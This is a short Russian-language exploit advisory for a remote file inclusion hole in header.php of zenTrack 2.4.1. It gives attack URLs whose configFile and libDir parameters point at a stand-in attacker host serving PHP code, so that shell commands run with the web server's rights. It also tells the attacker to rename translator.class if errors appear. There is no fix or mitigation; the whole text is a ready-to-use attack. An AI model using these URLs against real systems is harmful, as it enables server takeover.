Уязвимый продукт : zenTrack 2.4.1 (ранние?) и следующие
Сайт создателя : http://zendocs.phpzen.net/zentrack/
Уязвимость в header.php позволяет атакующим выполнять команды с правами вебсервера. Пример:
http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php? cmd=pwd
или
Создайте файл translator.class где-нибудь у себя на сервере, содержащий php код, который позволит вам исполнят ькоманды. К примеру, я создал файл translator.class в папке
test:
http://[victim]/zentrack/www/index.php?libDir=http:// [attacker]/test/&cmd=pwd
Если начинают вылезать ошибки копируйте translator.class в zenTrack.class.